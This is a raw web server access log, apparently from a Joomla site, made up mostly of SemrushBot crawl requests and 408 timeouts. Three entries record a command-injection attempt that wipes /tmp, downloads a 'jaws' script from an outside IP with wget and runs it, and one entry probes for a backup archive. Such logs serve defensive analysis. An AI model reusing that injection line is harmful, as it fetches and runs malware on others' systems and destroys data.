185.191.171.37 - - [08/Mar/2023:22:17:51 +0100] "GET /?Itemid=53&fontstyle=f-larger&id=364&lang=fr&option=com_content&view=article HTTP/1.1" 302 564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.34 - - [08/Mar/2023:22:18:18 +0100] "GET /?Itemid=48&catid=7&fontstyle=f-larger&id=23&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:22:18:20 +0100] "GET /?Itemid=0&fontstyle=f-smaller&lang=en&option=com_xmap&sitemap=1 HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [08/Mar/2023:22:18:21 +0100] "GET /index.php?Itemid=53&catid=7&id=12&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:22:18:23 +0100] "GET /?Itemid=3&fontstyle=f-smaller&id=354&lang=fr&option=com_content&view=article HTTP/1.1" 302 563 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:22:18:25 +0100] "GET /?Itemid=0&catid=7&fontstyle=f-smaller&id=62&lang=fr&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [08/Mar/2023:22:18:31 +0100] "GET /index.php?catid=7&id=59&lang=fr&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:18:41 +0100] "GET /index.php?Itemid=0&id=269&lang=en&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:22:18:45 +0100] "GET /?Itemid=5&catid=7&fontstyle=f-smaller&id=24&lang=en&option=com_content&view=article HTTP/1.1" 302 577 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:19:28 +0100] "-" 408 1489 "-" "-"
185.191.171.33 - - [08/Mar/2023:22:19:29 +0100] "GET /?Itemid=48&catid=7&fontstyle=f-larger&id=34&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:20:00 +0100] "-" 408 1489 "-" "-"
185.191.171.4 - - [08/Mar/2023:22:20:07 +0100] "GET /?catid=7&fontstyle=f-larger&id=26&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:22:20:47 +0100] "GET /?Itemid=16&catid=7&fontstyle=f-smaller&id=32&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:20:51 +0100] "GET /index.php?Itemid=50&catid=7&id=32&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [08/Mar/2023:22:21:03 +0100] "GET /?Itemid=53&fontstyle=f-smaller&id=347&lang=en&option=com_content&view=article HTTP/1.1" 302 566 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [08/Mar/2023:22:21:06 +0100] "GET /?catid=8&fontstyle=f-larger&id=135&lang=en&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:21:25 +0100] "GET /index.php?Itemid=16&catid=7&id=61&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:22:07 +0100] "-" 408 1489 "-" "-"
185.191.171.7 - - [08/Mar/2023:22:22:21 +0100] "GET /index.php?Itemid=53&catid=1&id=474&lang=en&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:22:23 +0100] "GET /index.php?Itemid&catid=7&id=67&lang=en&option=com_content&view=article HTTP/1.1" 302 553 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.24 - - [08/Mar/2023:22:22:34 +0100] "GET /?Itemid&catid=7&fontstyle=f-smaller&id=23&lang=fr&option=com_content&view=article HTTP/1.1" 302 572 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:22:22:35 +0100] "GET /index.php?Itemid=48&catid=7&id=57&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:22:22:40 +0100] "GET /?Itemid&catid=7&fontstyle=f-larger&id=20&lang=fr&option=com_content&view=article HTTP/1.1" 302 571 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.24 - - [08/Mar/2023:22:22:55 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-larger&id=33&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.45 - - [08/Mar/2023:22:23:05 +0100] "GET /index.php?Itemid&catid=7&id=45&lang=fr&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
42.243.167.8 - - [08/Mar/2023:22:23:13 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 302 578 "-" "Hello, world"
60.221.224.113 - - [08/Mar/2023:22:23:14 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 302 578 "-" "Hello, world"
185.191.171.36 - - [08/Mar/2023:22:23:33 +0100] "GET /index.php?Itemid=3&catid=7&id=34&lang=en&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:23:33 +0100] "GET /index.php?Itemid=53&catid=1&id=438&lang=en&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
183.237.207.140 - - [08/Mar/2023:22:23:42 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 302 578 "-" "Hello, world"
185.191.171.37 - - [08/Mar/2023:22:23:49 +0100] "GET /index.php?Itemid&catid=7&id=28&lang=fr&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:24:21 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [08/Mar/2023:22:24:26 +0100] "-" 408 1489 "-" "-"
185.191.171.3 - - [08/Mar/2023:22:24:36 +0100] "GET /?Itemid=0&catid=8&fontstyle=f-smaller&id=205&lang=fr&option=com_content&view=article HTTP/1.1" 302 577 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [08/Mar/2023:22:25:01 +0100] "GET /?fontstyle=f-larger>ask=archive&lang=fr&listid=1%3Amailing_list&option=com_acymailing HTTP/1.1" 302 579 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [08/Mar/2023:22:26:18 +0100] "GET /index.php?Itemid=0&id=349&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.22 - - [08/Mar/2023:22:26:23 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=367&lang=en&option=com_content&view=article HTTP/1.1" 302 564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.2 - - [08/Mar/2023:22:26:25 +0100] "GET /index.php?Itemid=0&id=308&lang=en&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:27:00 +0100] "-" 408 1489 "-" "-"
185.191.171.45 - - [08/Mar/2023:22:27:03 +0100] "GET /index.php?Itemid=11&catid=7&id=59&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.39 - - [08/Mar/2023:22:27:43 +0100] "GET /index.php?Itemid=3&id=348&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:22:27:43 +0100] "GET /?Itemid=50&catid=7&fontstyle=f-smaller&id=55&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.12 - - [08/Mar/2023:22:27:49 +0100] "GET /index.php?Itemid&id=314&lang=en&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:22:28:30 +0100] "GET /index.php?Itemid=49&catid=7&id=18&lang=en&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:28:37 +0100] "GET /?Itemid=16&catid=7&fontstyle=f-smaller&id=21&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:28:53 +0100] "-" 408 1489 "-" "-"
185.191.171.43 - - [08/Mar/2023:22:29:01 +0100] "GET /?Itemid=3&catid=7&fontstyle=f-smaller&id=24&lang=en&option=com_content&view=article HTTP/1.1" 302 577 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:29:15 +0100] "-" 408 1489 "-" "-"
185.191.171.33 - - [08/Mar/2023:22:29:18 +0100] "GET /index.php?Itemid=0&fontstyle=f-larger>ask=archive&lang=en&listid=1%3Amailing_list&option=com_acymailing HTTP/1.1" 302 610 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [08/Mar/2023:22:29:43 +0100] "GET /?Itemid=0&fontstyle=f-smaller&id=318&lang=en&option=com_content&view=article HTTP/1.1" 302 563 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [08/Mar/2023:22:29:44 +0100] "GET /?Itemid=3&fontstyle=f-smaller&id=300&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [08/Mar/2023:22:29:46 +0100] "GET /?Itemid&fontstyle=f-smaller&id=356&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:22:29:48 +0100] "GET /?Itemid=46&catid=7&fontstyle=f-smaller&id=19&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.24 - - [08/Mar/2023:22:30:37 +0100] "GET /index.php?id=297&lang=fr&option=com_content&view=article HTTP/1.1" 302 530 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:22:30:43 +0100] "GET /index.php?Itemid=12&catid=7&id=49&lang=fr&option=com_content&view=article HTTP/1.1" 302 559 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:22:30:43 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=136&lang=fr&option=com_content&view=article HTTP/1.1" 302 563 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:22:31:22 +0100] "GET /?Itemid=6&fontstyle=f-larger&lang=fr&option=com_wrapper&view=article HTTP/1.1" 302 549 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [08/Mar/2023:22:31:26 +0100] "GET /index.php?catid=7&id=25&lang=fr&option=com_content&view=article HTTP/1.1" 302 542 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [08/Mar/2023:22:31:31 +0100] "GET /index.php?Itemid=0&id=261&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [08/Mar/2023:22:31:44 +0100] "GET /?Itemid&fontstyle=f-larger&lang=fr&option=com_xmap&sitemap=1 HTTP/1.1" 302 537 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:31:54 +0100] "-" 408 1489 "-" "-"
185.191.171.37 - - [08/Mar/2023:22:32:01 +0100] "GET /?Itemid=3&catid=7&fontstyle=f-smaller&id=9&lang=fr&option=com_content&view=article HTTP/1.1" 302 573 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.24 - - [08/Mar/2023:22:32:42 +0100] "GET /index.php?catid=1&id=1&lang=fr&option=com_content&view=article HTTP/1.1" 302 538 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:22:32:53 +0100] "GET /index.php?Itemid=45&catid=7&id=6&lang=fr&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:33:19 +0100] "-" 408 1489 "-" "-"
185.191.171.16 - - [08/Mar/2023:22:33:22 +0100] "GET /?Itemid=12&catid=7&fontstyle=f-smaller&id=58&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [08/Mar/2023:22:33:36 +0100] "GET /index.php?Itemid=3&catid=7&id=11%E2%8C%A9%3Dfr&lang=en&option=com_content&view=article HTTP/1.1" 302 583 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.42 - - [08/Mar/2023:22:33:59 +0100] "GET /?fontstyle=f-smaller&lang=fr&option=com_content&view=frontpage HTTP/1.1" 302 537 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:34:08 +0100] "-" 408 1489 "-" "-"
185.191.171.34 - - [08/Mar/2023:22:34:20 +0100] "GET /?Itemid=46&catid=7&fontstyle=f-larger&id=18&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.18 - - [08/Mar/2023:22:34:24 +0100] "GET /index.php?Itemid=3&catid=7&id=36&lang=fr&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
194.110.203.45 - - [08/Mar/2023:22:34:49 +0100] "GET /backup_12032022.zip HTTP/1.1" 404 2162 "-" "Firefox"
185.191.171.9 - - [08/Mar/2023:22:35:16 +0100] "GET /index.php?Itemid&catid=8&id=125&lang=fr&option=com_content&view=article HTTP/1.1" 302 556 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [08/Mar/2023:22:35:27 +0100] "GET /index.php?Itemid=3&id=368&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [08/Mar/2023:22:35:30 +0100] "GET /index.php?Itemid=3&id=361&lang=en&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:22:35:33 +0100] "GET /index.php?Itemid=0&catid=8&id=114&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.41 - - [08/Mar/2023:22:35:33 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=211&lang=en&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.26 - - [08/Mar/2023:22:36:02 +0100] "GET /index.php?Itemid=53&catid=12&id=429%E2%8C%A9%3Dfr&lang=en&option=com_content&view=article HTTP/1.1" 302 589 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:22:36:03 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=277&lang=fr&option=com_content&view=article HTTP/1.1" 302 563 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [08/Mar/2023:22:36:24 +0100] "GET /index.php?Itemid=50&catid=7&id=6&lang=en&option=com_content&view=article HTTP/1.1" 302 557 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [08/Mar/2023:22:36:24 +0100] "GET /?Itemid&fontstyle=f-smaller&id=352&lang=fr&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:36:47 +0100] "-" 408 1489 "-" "-"
185.191.171.10 - - [08/Mar/2023:22:36:49 +0100] "GET /index.php?Itemid=12&id=60&lang=en&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:22:36:52 +0100] "GET /index.php?Itemid=47&id=47&lang=fr&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [08/Mar/2023:22:37:10 +0100] "GET /index.php?Itemid=53&id=314&lang=en&option=com_content&view=article HTTP/1.1" 302 546 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:22:37:33 +0100] "GET /?Itemid&catid=7&fontstyle=f-larger&id=9&lang=en&option=com_content&view=article HTTP/1.1" 302 569 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
211.149.241.233 - - [08/Mar/2023:22:37:41 +0100] "-" 408 0 "-" "-"
212.129.37.175 - - [08/Mar/2023:22:37:46 +0100] "-" 408 1489 "-" "-"
185.191.171.2 - - [08/Mar/2023:22:38:00 +0100] "GET /?Itemid=14&catid=7&fontstyle=f-larger&id=59&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.34 - - [08/Mar/2023:22:38:12 +0100] "GET /robots.txt HTTP/1.1" 302 441 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.26 - - [08/Mar/2023:22:38:16 +0100] "GET /?Itemid=5&catid=7&fontstyle=f-smaller&id=53&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.34 - - [08/Mar/2023:22:38:18 +0100] "GET /?catid=7&fontstyle=f-larger&id=61&lang=en&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.42 - - [08/Mar/2023:22:38:37 +0100] "GET /?Itemid=3&catid=7&fontstyle=f-smaller&id=9&lang=en&option=com_content&view=article HTTP/1.1" 302 574 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.10 - - [08/Mar/2023:22:38:55 +0100] "GET /index.php?Itemid=48&id=47&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:39:01 +0100] "-" 408 1489 "-" "-"
185.191.171.38 - - [08/Mar/2023:22:39:04 +0100] "GET /?Itemid=53&fontstyle=f-smaller&id=362&lang=fr&option=com_content&view=article HTTP/1.1" 302 565 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.22 - - [08/Mar/2023:22:39:12 +0100] "GET /?Itemid=53&catid=1&fontstyle=f-larger&id=434&lang=en&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [08/Mar/2023:22:39:24 +0100] "GET /?Itemid=53&catid=1&fontstyle=f-smaller&id=476&lang=fr&option=com_content&view=article HTTP/1.1" 302 578 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:22:39:48 +0100] "GET /?Itemid&fontstyle=f-smaller&lang=en&option=com_content&view=frontpage HTTP/1.1" 302 550 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [08/Mar/2023:22:40:43 +0100] "GET /?Itemid=16&catid=7&fontstyle=f-smaller&id=45&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [08/Mar/2023:22:41:05 +0100] "GET /index.php?catid=7&id=23&lang=en&option=com_content&view=article HTTP/1.1" 302 541 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [08/Mar/2023:22:41:21 +0100] "GET /index.php?Itemid=3&id=287&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:41:41 +0100] "-" 408 1489 "-" "-"
185.191.171.35 - - [08/Mar/2023:22:42:00 +0100] "GET /index.php?Itemid&catid=7&id=56&lang=en&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.40 - - [08/Mar/2023:22:42:12 +0100] "GET /index.php?Itemid=0&id=299&lang=en&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [08/Mar/2023:22:42:12 +0100] "GET /index.php?Itemid=3&id=238&lang=fr&option=com_content&view=article HTTP/1.1" 302 545 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:42:12 +0100] "-" 408 1489 "-" "-"
185.191.171.40 - - [08/Mar/2023:22:42:19 +0100] "GET /index.php?Itemid=16&catid=7&id=51&lang=en&option=com_content&view=article HTTP/1.1" 302 558 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.4 - - [08/Mar/2023:22:43:06 +0100] "GET /?Itemid=16&catid=7&fontstyle=f-smaller&id=57&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [08/Mar/2023:22:43:13 +0100] "GET /?Itemid=53&catid=1&fontstyle=f-larger&id=233&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [08/Mar/2023:22:43:52 +0100] "GET /index.php?Itemid=16&id=47&lang=en&option=com_content&view=article HTTP/1.1" 302 546 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:43:55 +0100] "-" 408 1489 "-" "-"
185.191.171.23 - - [08/Mar/2023:22:44:11 +0100] "GET /index.php?catid=8&id=109&lang=fr&option=com_content&view=article HTTP/1.1" 302 544 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [08/Mar/2023:22:44:47 +0100] "GET /?catid=7&fontstyle=f-smaller&id=51&lang=fr&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.23 - - [08/Mar/2023:22:45:35 +0100] "GET /?Itemid=0&fontstyle=f-larger&id=201&lang=en&option=com_content&view=article HTTP/1.1" 302 561 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.33 - - [08/Mar/2023:22:45:37 +0100] "GET /index.php?Itemid=53&catid=1&id=417%3F%3Dfr&lang=fr&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [08/Mar/2023:22:45:40 +0100] "GET /?Itemid=3&catid=7&fontstyle=f-smaller&id=5&lang=en&option=com_content&view=article HTTP/1.1" 302 575 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.7 - - [08/Mar/2023:22:46:10 +0100] "GET /?catid=7&fontstyle=f-smaller&id=28&lang=en&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.6 - - [08/Mar/2023:22:46:11 +0100] "GET /?Itemid&fontstyle=f-smaller&id=319&lang=fr&option=com_content&view=article HTTP/1.1" 302 560 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.11 - - [08/Mar/2023:22:46:17 +0100] "GET /index.php?Itemid&catid=7&id=53&lang=en&option=com_content&view=article HTTP/1.1" 302 554 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.129.37.175 - - [08/Mar/2023:22:46:34 +0100] "-" 408 1489 "-" "-"
212.129.37.175 - - [08/Mar/2023:22:46:39 +0100] "-" 408 1489 "-" "-"
185.191.171.16 - - [08/Mar/2023:22:46:47 +0100] "GET /?Itemid=48&catid=7&fontstyle=f-smaller&id=12&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.44 - - [08/Mar/2023:22:47:21 +0100] "GET /?Itemid=45&catid=7&fontstyle=f-smaller&id=22&lang=fr&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.23 - - [08/Mar/2023:22:48:04 +0100] "GET /?Itemid=11&catid=7&fontstyle=f-larger&id=55&lang=en&option=com_content&view=article HTTP/1.1" 302 576 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
